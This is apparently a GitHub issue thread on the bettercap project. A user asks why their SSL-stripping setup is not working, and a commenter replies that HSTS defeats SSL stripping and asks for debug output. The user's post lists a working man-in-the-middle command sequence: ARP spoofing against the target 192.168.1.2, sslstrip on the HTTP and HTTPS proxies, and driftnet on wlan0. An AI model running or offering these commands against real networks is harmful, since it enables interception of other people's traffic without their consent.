### ISSUE TITLE
https.proxy.ssltrip and driftnet

### ISSUE THREAD

**Issue by ChillVibesMushroom** [bettercap/bettercap#949]
How would I use https.proxy and driftnet? The commands I use are,

net.probe on
net.sniff on

http.proxy.sslstrip true
https.proxy.sslstrip true
set arp.spoof.fullduplex
set arp.spoof.targets 192.168.1.2
http.proxy on
https.proxy on
arp.spoof on

drift -i wlan0 

I'm really tired I just got off work and I go in again in like five hours dev team please shed some glory on me 🥺

**Comment by Azrotronik** [comment]
This isn't an issue that you can get assistance on without any debug info, sadly
Keep in mind that it's not always guaranteed to MITM correctly, most websites apply HSTS which is specifically made to counter SSLstripping.
Have you tried victimizing yourself using a website that you know is downgradable, but didn't work?

**Comment by ChillVibesMushroom** [comment]
> 

Thanks bro my sister has me studying ftp right now later on tonight or in the morning I'll post debug information. You mean debug info from bettercap right nothing like Wireshark or any of that.
